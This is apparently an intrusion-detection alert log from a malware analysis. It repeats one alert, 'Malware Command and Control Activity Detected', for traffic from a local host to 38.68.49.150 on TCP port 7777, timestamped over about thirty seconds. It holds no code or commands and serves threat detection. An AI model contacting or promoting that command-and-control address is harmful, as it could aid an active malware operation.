                2025-03-16T01:40:22.572293+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:22.681616+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:22.790859+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:22.918538+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:23.009724+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:23.119067+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:23.228617+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:23.337842+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:23.469574+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:23.572243+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:23.743001+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:24.145794+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:24.259997+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:24.369126+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:24.478853+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:24.587798+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:24.697405+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:24.806668+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:24.915858+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:25.025376+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:25.134660+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:25.244011+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:25.390554+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:25.462856+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:25.572070+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:25.681566+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:25.806461+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:25.900324+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:26.009663+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:26.119148+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:26.228503+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:26.370607+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:26.448007+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:26.556618+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:26.665987+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:26.775521+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:26.886679+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:26.994035+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:27.103577+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:27.243267+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:27.353434+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:27.462806+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:27.572098+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:27.681578+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:27.791245+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:27.900392+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:28.009660+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:28.119586+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:28.229456+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:28.349979+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:28.462826+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:28.575181+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:28.681662+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:28.790865+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:28.900236+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:29.009649+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:29.118971+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:29.228759+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:29.397783+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:29.447567+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:29.556828+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:29.665938+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:29.780769+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:29.884759+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:29.994287+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:30.108683+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:30.212769+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:30.328599+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:30.467644+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:30.572417+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:30.704564+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:30.954507+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:31.056486+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:31.165869+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:31.275165+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:31.384678+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:31.493949+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:31.612951+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:31.712721+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:31.822224+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:31.931542+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:32.040909+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:32.155443+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:32.259807+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:32.373210+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:32.478398+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:32.588030+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:32.697402+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:32.806566+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:32.916251+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:33.025229+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:33.140365+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:33.291018+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:33.519976+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:33.786057+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:33.900290+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:34.009560+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:34.118952+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:34.228725+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:34.337786+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:34.447382+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:34.556802+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:34.665955+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:34.775243+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:34.888495+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:35.009828+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:35.119229+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:35.228506+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:35.338098+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:35.447917+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:35.556628+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:35.666138+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:35.775275+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:35.889641+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:35.995537+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:36.105247+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:36.213647+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:36.322237+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:36.472394+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:36.619938+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:36.728619+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:36.862502+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:36.947237+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:37.056767+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:37.166565+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:37.275337+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:37.386500+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:37.494112+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:37.603530+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:37.712802+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:37.825710+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:37.931535+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:38.041202+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:38.150555+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:38.259690+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:38.369154+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:38.506501+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:38.587842+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:38.728883+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:38.837889+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:38.947146+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:39.056462+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:39.166013+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:39.275600+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:39.384663+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:39.494057+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:39.618605+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:39.712884+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:39.822477+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:39.931621+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:40.041020+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:40.150465+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:40.260567+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:40.369093+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:40.478745+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:40.587759+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:40.699797+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:40.806515+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:40.918886+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:41.025411+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:41.134684+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:41.258508+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:41.353548+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:41.462803+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:41.572323+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:41.681562+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:41.791015+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:41.900384+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:42.009920+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:42.121887+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:42.228699+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:42.529165+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:42.696608+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:42.806685+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:42.916015+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:43.025319+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:43.134570+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:43.243948+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:43.353486+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:43.462737+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:43.572281+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:43.681541+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:43.791024+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:43.903417+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:44.009847+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:44.119350+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:44.228399+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:44.337843+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:44.449264+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:44.556571+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:44.666203+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:44.775260+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:44.887501+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:45.009884+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:45.129161+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:45.329258+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:45.452618+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:45.556768+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:45.665947+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:45.775587+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:45.884864+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:45.994115+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:46.103549+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:46.221475+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:46.337784+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:46.447476+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:46.556652+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:46.665982+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:46.778348+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:46.884699+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:46.994187+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:47.103872+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:47.213018+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:47.322278+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:47.431544+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:47.540971+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:47.650569+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:47.759900+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:47.876108+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:47.979504+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:48.089819+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:48.197411+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:48.306850+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:48.416053+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:48.528325+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:48.635038+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:48.744342+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:48.866459+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:48.962850+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:49.073920+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:49.208799+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:49.322189+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:49.431526+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:49.561526+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:49.666221+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:49.775447+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:49.885130+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:49.994161+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:50.103501+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:50.212919+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:50.346469+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:50.431608+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:50.548872+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:50.650369+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:50.759863+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:50.869083+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:50.978618+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:51.088097+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:51.197215+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:51.306799+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:51.400243+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:51.494071+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:51.591118+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:51.681595+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:51.790955+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:51.884829+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:51.978607+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:52.072422+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:52.165999+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:52.259733+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:52.353728+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:52.447285+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:52.541745+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:52.634842+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:52.728624+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:52.823961+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
                2025-03-16T01:40:52.915912+010028528731Malware Command and Control Activity Detected192.168.2.84968638.68.49.1507777TCP
